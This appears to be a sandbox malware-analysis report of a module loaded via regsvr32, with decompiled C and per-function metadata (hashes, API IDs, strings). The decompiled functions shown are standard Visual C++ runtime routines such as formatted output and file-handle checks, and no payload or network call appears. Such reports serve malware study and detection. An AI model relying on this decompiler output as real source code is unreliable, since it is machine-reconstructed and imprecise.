                                                                                				_t107 = E00007FFA7FFA5246C410(__ecx, E00007FFA7FFA5247D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
                                                                                				if (_a32[5] != 8) goto 0x52475807;
                                                                                				if ( *_v64 == 0) goto 0x52475807;
                                                                                				_t186 = _v64;
                                                                                				E00007FFA7FFA52475B30(_t107,  *_t186,  &(_a32[2]));
                                                                                				 *_v64 = _t186;
                                                                                				goto 0x5247580e;
                                                                                				_t109 = E00007FFA7FFA5246CF80(_t186);
                                                                                				goto 0x5247595a;
                                                                                				_t187 = _a32;
                                                                                				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0x5247583c;
                                                                                				E00007FFA7FFA5246E6A0(_t109, _t187);
                                                                                				_v40 = _t187 + _a32[6];
                                                                                				goto 0x52475845;
                                                                                				_v40 = 0;
                                                                                				if (_v40 != 0) goto 0x524758c6;
                                                                                				if (E00007FFA7FFA5247D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x524758bc;
                                                                                				if (E00007FFA7FFA5247D2C0(1, _v64) == 0) goto 0x524758bc;
                                                                                				_t191 = _a32[5];
                                                                                				_v32 = _a32[5];
                                                                                				E00007FFA7FFA52475B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
                                                                                				E00007FFA7FFA5246C410(__ecx, E00007FFA7FFA5247D2C0(1, _v64), _v64, _a32[5], _v32);
                                                                                				goto 0x524758c1;
                                                                                				E00007FFA7FFA5246CF80(_t191);
                                                                                				goto 0x5247595a;
                                                                                				if (E00007FFA7FFA5247D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x52475955;
                                                                                				if (E00007FFA7FFA5247D2C0(1, _v64) == 0) goto 0x52475955;
                                                                                				_t193 = _a32;
                                                                                				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0x52475919;
                                                                                				E00007FFA7FFA5246E6A0(_t117, _t193);
                                                                                				_v24 = _t193 + _a32[6];
                                                                                				goto 0x52475922;
                                                                                				_v24 = 0;
                                                                                				if (E00007FFA7FFA5247D2F0(_v24) == 0) goto 0x52475955;
                                                                                				_t195 = _a32;
                                                                                				if (( *_a32 & 0x00000004) == 0) goto 0x5247594b;
                                                                                				_v72 = 2;
                                                                                				goto 0x52475953;
                                                                                				_v72 = 1;
                                                                                				goto 0x5247595a;
                                                                                				E00007FFA7FFA5246CF80(_a32);
                                                                                				E00007FFA7FFA5246CF50(_t195);
                                                                                				return _v72;
                                                                                			}


                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                                                                • String ID:
                                                                                • API String ID: 801082872-0
                                                                                • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                                • Instruction ID: 1b29972ecb2c688b3f8b562ab704c6ad06bd0669882e8859774c4aed708ff78a
                                                                                • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                                • Instruction Fuzzy Hash: FCA10F2260CA8182EB609B15E85037A67F0FBC5B94F5C8131DE9D8B7A9DFBCD456CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                                                                • API String ID: 2123368286-1993839260
                                                                                • Opcode ID: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                                • Instruction ID: 866cd50600b7e4bff5c328e651add53c8574788b18449263942612fab636e604
                                                                                • Opcode Fuzzy Hash: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                                • Instruction Fuzzy Hash: 3AE15F36A1C7858AE7609B14E84436AB3F1FB86344F188135E6AD87B9CDFBDE445CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                                                                • API String ID: 2123368286-1853640030
                                                                                • Opcode ID: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                                • Instruction ID: 166c8eea9f4d2cc41b6a63c6259d84e5dccc3b9e359130751f8d7404d9493f43
                                                                                • Opcode Fuzzy Hash: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                                • Instruction Fuzzy Hash: 2CE13832A1C6868AE7608B14E85436BB7F1FB86344F988035E6AD47B98DFBDD445CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 22%
                                                                                			E00007FFA7FFA5247E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                                                				signed int _t224;
                                                                                				signed char _t229;
                                                                                				void* _t260;
                                                                                				intOrPtr _t268;
                                                                                				signed int _t342;
                                                                                				signed int _t343;
                                                                                				signed long long _t346;
                                                                                				intOrPtr* _t365;
                                                                                				intOrPtr* _t370;
                                                                                				signed long long _t400;
                                                                                
                                                                                				_t342 = __rax;
                                                                                				_a80 = _a80 | 0x00000040;
                                                                                				_a72 = 0xa;
                                                                                				_a72 = 0xa;
                                                                                				_a116 = 0x10;
                                                                                				asm("bts eax, 0xf");
                                                                                				_a1220 = 7;
                                                                                				_a1220 = 0x27;
                                                                                				_a72 = 0x10;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247e74d;
                                                                                				_a84 = 0x30;
                                                                                				_a86 = _a1220 + 0x51;
                                                                                				_a92 = 2;
                                                                                				_a72 = 8;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247e770;
                                                                                				asm("bts eax, 0x9");
                                                                                				if ((_a80 & 0x00008000) == 0) goto 0x5247e797;
                                                                                				E00007FFA7FFA52471EA0( &_a1560);
                                                                                				_a1304 = _t342;
                                                                                				goto 0x5247e844;
                                                                                				if ((_a80 & 0x00001000) == 0) goto 0x5247e7be;
                                                                                				E00007FFA7FFA52471EA0( &_a1560);
                                                                                				_a1304 = _t342;
                                                                                				goto 0x5247e844;
                                                                                				if ((_a80 & 0x00000020) == 0) goto 0x5247e809;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247e7ef;
                                                                                				_t343 = E00007FFA7FFA52471E40( &_a1560);
                                                                                				_a1304 = _t343;
                                                                                				goto 0x5247e807;
                                                                                				E00007FFA7FFA52471E40( &_a1560);
                                                                                				_a1304 = _t343;
                                                                                				goto 0x5247e844;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247e82d;
                                                                                				E00007FFA7FFA52471E40( &_a1560);
                                                                                				_a1304 = _t343;
                                                                                				goto 0x5247e844;
                                                                                				E00007FFA7FFA52471E40( &_a1560);
                                                                                				_a1304 = _t343;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247e87b;
                                                                                				if (_a1304 >= 0) goto 0x5247e87b;
                                                                                				_a1312 =  ~_a1304;
                                                                                				asm("bts eax, 0x8");
                                                                                				goto 0x5247e88b;
                                                                                				_t346 = _a1304;
                                                                                				_a1312 = _t346;
                                                                                				if ((_a80 & 0x00008000) != 0) goto 0x5247e8c0;
                                                                                				if ((_a80 & 0x00001000) != 0) goto 0x5247e8c0;
                                                                                				_a1312 = _a1312 & _t346;
                                                                                				if (_a116 >= 0) goto 0x5247e8d1;
                                                                                				_a116 = 1;
                                                                                				goto 0x5247e8ee;
                                                                                				_a80 = _a80 & 0xfffffff7;
                                                                                				if (_a116 - 0x200 <= 0) goto 0x5247e8ee;
                                                                                				_a116 = 0x200;
                                                                                				if (_a1312 != 0) goto 0x5247e901;
                                                                                				_a92 = 0;
                                                                                				_a64 =  &_a687;
                                                                                				_t224 = _a116;
                                                                                				_a116 = _a116 - 1;
                                                                                				if (_t224 > 0) goto 0x5247e92f;
                                                                                				if (_a1312 == 0) goto 0x5247e9cc;
                                                                                				_a1480 = _a72;
                                                                                				_a1296 = _t224 / _a1480 + 0x30;
                                                                                				_a1488 = _a72;
                                                                                				if (_a1296 - 0x39 <= 0) goto 0x5247e9ab;
                                                                                				_t229 = _a1296 + _a1220;
                                                                                				_a1296 = _t229;
                                                                                				 *_a64 = _a1296 & 0x000000ff;
                                                                                				_a64 = _a64 - 1;
                                                                                				goto 0x5247e90e;
                                                                                				_a104 = _t229;
                                                                                				_a64 = _a64 + 1;
                                                                                				if ((_a80 & 0x00000200) == 0) goto 0x5247ea2a;
                                                                                				if (_a104 == 0) goto 0x5247ea0b;
                                                                                				if ( *_a64 == 0x30) goto 0x5247ea2a;
                                                                                				_a64 = _a64 - 1;
                                                                                				 *_a64 = 0x30;
                                                                                				_a104 = _a104 + 1;
                                                                                				if (_a108 != 0) goto 0x5247ec7c;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247ea9d;
                                                                                				if ((_a80 & 0x00000100) == 0) goto 0x5247ea61;
                                                                                				_a84 = 0x2d;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ea9d;
                                                                                				if ((_a80 & 0x00000001) == 0) goto 0x5247ea80;
                                                                                				_a84 = 0x2b;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ea9d;
                                                                                				if ((_a80 & 0x00000002) == 0) goto 0x5247ea9d;
                                                                                				_a84 = 0x20;
                                                                                				_a92 = 1;
                                                                                				_a1320 = _a88 - _a104 - _a92;
                                                                                				if ((_a80 & 0x0000000c) != 0) goto 0x5247eadf;
                                                                                				E00007FFA7FFA5247EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                				E00007FFA7FFA5247EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                                                				if ((_a80 & 0x00000008) == 0) goto 0x5247eb33;
                                                                                				if ((_a80 & 0x00000004) != 0) goto 0x5247eb33;
                                                                                				E00007FFA7FFA5247EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                                                				if (_a76 != 0) goto 0x5247ec29;
                                                                                				if (_a104 <= 0) goto 0x5247ec29;
                                                                                				_t365 = _a64;
                                                                                				_a1328 = _t365;
                                                                                				_a1336 = _a104;
                                                                                				_a1336 = _a1336 - 1;
                                                                                				if (_a1336 <= 0) goto 0x5247ec27;
                                                                                				_t260 = E00007FFA7FFA52466840(_a1336,  &_a120);
                                                                                				_a1496 = _t365;
                                                                                				E00007FFA7FFA52466840(_t260,  &_a120);
                                                                                				_a1340 = E00007FFA7FFA5247F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
                                                                                				if (_a1340 > 0) goto 0x5247ebe7;
                                                                                				_a1200 = 0xffffffff;
                                                                                				goto 0x5247ec27;
                                                                                				E00007FFA7FFA5247EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                                                				_a1328 = _a1328 + _a1340;
                                                                                				goto 0x5247eb61;
                                                                                				goto 0x5247ec47;
                                                                                				E00007FFA7FFA5247EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                                                				if (_a1200 < 0) goto 0x5247ec7c;
                                                                                				if ((_a80 & 0x00000004) == 0) goto 0x5247ec7c;
                                                                                				E00007FFA7FFA5247EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                				if (_a96 == 0) goto 0x5247ec9c;
                                                                                				0x52465330();
                                                                                				_a96 = 0;
                                                                                				goto 0x5247da75;
                                                                                				if (_a1216 == 0) goto 0x5247ecc2;
                                                                                				if (_a1216 == 7) goto 0x5247ecc2;
                                                                                				_a1504 = 0;
                                                                                				goto 0x5247eccd;
                                                                                				_a1504 = 1;
                                                                                				_t268 = _a1504;
                                                                                				_a1344 = _t268;
                                                                                				if (_a1344 != 0) goto 0x5247ed13;
                                                                                				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                				_a32 = _t370;
                                                                                				r9d = 0;
                                                                                				r8d = 0x8f5;
                                                                                				0x5246b3b0();
                                                                                				if (_t268 != 1) goto 0x5247ed13;
                                                                                				asm("int3");
                                                                                				if (_a1344 != 0) goto 0x5247ed6f;
                                                                                				0x5246ab30();
                                                                                				 *_t370 = 0x16;
                                                                                				_a32 = 0;
                                                                                				r9d = 0x8f5;
                                                                                				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                				_a1376 = 0xffffffff;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				goto 0x5247ed8e;
                                                                                				_a1380 = _a1200;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				return E00007FFA7FFA52463280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                			}














                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1967237116-1983305044
                                                                                • Opcode ID: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                                • Instruction ID: 4e30cb9aee4ee74be79ad7fa1ba63d8de704a448df8b597507b9df2f34ead710
                                                                                • Opcode Fuzzy Hash: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                                • Instruction Fuzzy Hash: 87F1E87260CAC58AE7748B15E8413ABB7F0EB86351F088135E69D87A99EFBCD441CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                                                                • API String ID: 2123368286-3477667311
                                                                                • Opcode ID: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                                • Instruction ID: d560db96166e12386591ffc35a33c891cdc1f21aaa13be5f4ae5e5f7508f529a
                                                                                • Opcode Fuzzy Hash: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                                • Instruction Fuzzy Hash: D4F13D31A1CB8695EB708B14E85436A67F0FB86794F188135D6AE83B9CDFBCE045CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                                                                • API String ID: 2123368286-1420200500
                                                                                • Opcode ID: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                                • Instruction ID: 7c36ebe05dda8cbb749e13adc3fc733e268f3c7cc9117da9fbe08fc507bb2c2f
                                                                                • Opcode Fuzzy Hash: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                                • Instruction Fuzzy Hash: 64F13B31A1CB8699EB708B14E84436A67F1FB86754F188135D6AE43BACDFBCE045CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                                                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2560055391-3497434347
                                                                                • Opcode ID: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                                • Instruction ID: 09e822ffce5aca71844268e09504d4e1b75e9746d2cd7e971170a10d490b8227
                                                                                • Opcode Fuzzy Hash: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                                • Instruction Fuzzy Hash: FDC1097290C6C68AE7718B14E8443AAB7F4FB85744F488135E6AC86A9DDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Similarity
                                                                                • API ID: __doserrno$_invalid_parameter
                                                                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                                • API String ID: 747159061-1442092225
                                                                                • Opcode ID: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                                • Instruction ID: 1156c5fa22bb78562ce6eba20f9c2f8eb6246edff4e6241685995f1b0017dff3
                                                                                • Opcode Fuzzy Hash: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                                • Instruction Fuzzy Hash: 4E616772A18A4686E7109B25EC9036A73F1FB827A4F588731E67D476D9DFBCE401CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                                                                • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                                                                • API String ID: 1778837556-2487400587
                                                                                • Opcode ID: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                                • Instruction ID: d850db067d59b36df44d7ccd0adb2c169ef94ded2bc34730e9aae60deb5c084d
                                                                                • Opcode Fuzzy Hash: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                                • Instruction Fuzzy Hash: C551C376618AC191E734CB04E8803EAB7F1FB89394F448135EA8D42AADDFBCE154CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                                                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 83251219-3442986447
                                                                                • Opcode ID: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                                • Instruction ID: 3acfa62c8cf6766660a237f446ea070c86ab20c4a99c5658ae12d1c3de0622b2
                                                                                • Opcode Fuzzy Hash: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                                • Instruction Fuzzy Hash: BDF1F67250CBC18AE7718B15E8843AAB7F4E786744F184135E69D86A9DDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                                                                • API String ID: 2123368286-2816485415
                                                                                • Opcode ID: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                                • Instruction ID: 820da16cd7ac5596269b35855b8f77bcc6be9b4014b15a951e68a1933e911f28
                                                                                • Opcode Fuzzy Hash: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                                • Instruction Fuzzy Hash: F7615F71A3864A96E7509B20EC8077A73F1FB92354F589235E66E46ADDDFBCE440CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno$_invalid_parameter
                                                                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                                                                • API String ID: 747159061-2992490823
                                                                                • Opcode ID: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                                • Instruction ID: 042fdc776fffcd2fe842acdb2b48905418aa3cb59c45fbd044c4bb4c35af2e7d
                                                                                • Opcode Fuzzy Hash: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                                • Instruction Fuzzy Hash: 8E515B31A2CA4696E7109B60E89537A73F1FB82794F589235E66D476E9DFBCE400CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                                • API String ID: 1930727954-3864165772
                                                                                • Opcode ID: 5564b6dcabe9d7da129c176dbab2495a25b1b938b9ffe894bef786fc52173cea
                                                                                • Instruction ID: b3c53ac2c416afa913de42937b9483f9a56f4e815ea31c913a587c66b23ac9eb
                                                                                • Opcode Fuzzy Hash: 5564b6dcabe9d7da129c176dbab2495a25b1b938b9ffe894bef786fc52173cea
                                                                                • Instruction Fuzzy Hash: C9F1EA22609BC5C9E770CB19E88076AB7B0F786B64F148226CAAD477E8DF7CD445CB11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
